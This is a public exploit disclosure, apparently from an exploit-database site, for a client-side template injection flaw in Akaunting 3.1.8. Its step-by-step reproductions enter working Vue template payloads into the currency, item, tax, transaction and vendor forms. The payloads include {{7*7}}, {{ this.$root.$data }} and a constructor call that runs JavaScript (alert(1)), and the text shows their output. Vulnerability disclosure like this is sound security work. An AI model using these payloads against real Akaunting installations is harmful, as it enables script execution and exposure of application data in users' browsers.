Authored by tmrswrr

Akaunting version 3.1.8 suffers from a client-side template injection vulnerability.

# Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8


1 ) Login with admin cred and go to : Currencies > New Currency
    https://127.0.0.1/Akaunting/1/settings/currencies
2 ) Write SSTI payload : {{ Object.keys(this) }} Name field 
3 ) Save it 
4 ) You will be see result : 
    "_uid",  "_isVue",
  "__v_skip",  "_scope",
  "$options",  "_renderProxy",
  "_self",  "$parent",
  "$root",  "$children",
  "$refs",
  
  > {{ this.$root.$data }}
  >  "form": {},
  "bulk_action": {
    "path": "currencies",
    "count": "",
    "value": "*",
    "message": "",
    "type": "",
    "show": false,
    "modal": false,
    "loading": false,
    "selected": [],
   
   > {{ Object.keys(this._self) }}
   > "_uid",
      "_isVue",
      "__v_skip",
      "_scope",
      "$options",
      "_renderProxy",
      "_self",
      "$parent",
      "$root",
      "$children",
      "$refs",



    > {{$on.constructor('alert(1)')()}}
    > You will be see alert box

=======================================================================================

1 ) Login with admin cred and go to : Items > New Item
    https://127.0.0.1/Akaunting/1/common/items
2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
3 ) Save it 
4 ) You will be see result : 
    49
    

====================================================================================

1 ) Login with admin cred and go to :Settings > Taxes > New Tax
    https://127.0.0.1/Akaunting/1/settings/taxes/1/edit
2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab
====================================================================================


1 ) Login with admin cred and go to : Banking > Transactions > New Income
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income
2 ) Write SSTI payload : {{7*7}}  Description field
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab
    
=======================================================================================

1 ) Login with admin cred
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit
2 ) Write SSTI payload : {{7*7}}  Name field
3 ) Save it 
4 ) You will be see result : 
    49
    > {{'a'.toUpperCase()}}
    > A
    > {{'a'.concat('b')}}
    > ab
    > {{self}}
    >


RELATED ARTICLESMORE FROM AUTHOR